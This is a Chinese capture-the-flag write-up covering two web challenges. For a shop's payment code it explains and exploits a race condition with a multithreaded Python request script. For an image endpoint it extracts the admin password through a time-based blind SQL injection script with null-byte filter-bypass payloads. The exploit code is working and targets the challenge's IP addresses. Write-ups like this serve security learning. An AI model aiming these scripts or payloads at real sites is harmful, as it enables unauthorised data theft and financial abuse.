• web中的条件竞争漏洞

    simple_shop

    web中的条件竞争漏洞:

    线程编程中,为了保证数据操作的一致性,操作系统引入了锁机制,用于保证临界区代码的安全。通过锁机制,能够保证在多核多线程环境中,在某一个时间点上,只能有一个线程进入临界区代码,从而保证临界区中操作数据的一致性。

    临界区指的是一个访问共用资源(例如:共用设备或是共用存储器)的程序片段,而这些共用资源又无法同时被多个线程访问的特性。

    竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。

    御剑扫一下发现备份源码,关键部分如下:

    if ($_POST['money']){

    $money = intval($_POST['money']);
    if($money<0)
    {
    	echo "<script>alert('我们极光虽然有钱...但兄弟姐妹你这样我们会破产的...')</script>";
    	exit();
    }
    if($money <= $rest) {

        $sql = "UPDATE account SET rest=rest-".$money;

        $db->query($sql);

        $sql = "UPDATE account SET own=own+".$money;

        $db->query($sql);

        echo "<script>alert('支付成功');window.location.href=this.location.href</script>";

    } else {

        echo "<script>alert('支付失败,可能是因为您的余额不足。')</script>";

    }
    $sql="select own from account";
    $banner = intval($db->query($sql)->fetch_assoc()['own']);
   	if($own>=21)
   	{
   		echo "等等..竟然!无中生友,你怕不是黑黑黑...
ACTF{************}";
   	}
}

    多线程脚本:

    import requests
import threading
import queue

url = "http://47.112.16.34:22255/index.php"
threads = 20
q = queue.Queue()

for i in range(50):
    q.put(i)

def post():
    while not q.empty():
        q.get()
        r = requests.post(url, data={'money': 1})
        print(r.text)

if __name__ == '__main__':
    for i in range(threads):
        t = threading.Thread(target=post)
        t.start()

    for i in range(threads):
        t.join()

    Easy web

    御剑扫一下出来个robot.txt和image.php

    1571726250714

    不允许爬虫访问*.php.bak,试试image.php.bak,发现备份下载

    $id=str_replace(array("\0","%00","\'","'"),"",$id);
$path=str_replace(array("\0","%00","\'","'"),"",$path);

    试了试没有错误回显,猜是时间盲注,嫖了斌斌的脚本:

    # insert into member(`username`,pw,sex,phonenum,email,address) values('wangwu',md5('a'),'a','aa','a','a')
import requests
import time

url = "http://47.106.94.13:40005/image.php?"
#params = "id=\0&path= or if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))={}),sleep(5),1)--+"
params = "id=\0&path= or if((ascii(mid((select password from users where username=0x61646d696e),{},1))={}),sleep(5),1)--+"

string = "1234567890abcdefghijklmnopqrstuvwxyz -ABCDEFGHIJKLMNOPQRSTUVWXYZ:_@,{}."

while True:
    
    #payload = "if((ascii(mid((select group_concat(database()) ),{},1))={}),sleep(4),1))#"
    #payload = "if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}),sleep(4),1)"
    #payload = "if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='Look_here'),{},1))={}),sleep(4),1)"
    #payload = "if((ascii(mid((select * from Look_here limit 1),{},1))={}),sleep(4),1)"
    get = ""
    for i in range(1,100):
        for j in string:
            parm = params.format(str(i),str(ord(j)))
            url2 = url + parm 
            try:
                response = requests.get(url2,timeout=3)
                
                
            except:
                get+=j
                print(get)
                time.sleep(1)
                break
        #print(url2)

    出来密码596c3f5fcccfdfef231c,登录成功,后面暂时还没搞出来,先占个坑叭(›´ω`‹ )
  • 相关阅读:
    输入框只能输入正数且保留小数后2位数字,正则
    vscode安装ESlint配置
    kubreretes && docker 模块
    python3安装sqlite3库
    dokcerfile 制作Msql镜像
    前端模板
    Python SMTP发送邮件
    k8s-api
    openpyxl
    k8s mysql主从
  • 原文地址:https://www.cnblogs.com/localhost-ha/p/11735881.html
Copyright © 2020-2023  润新知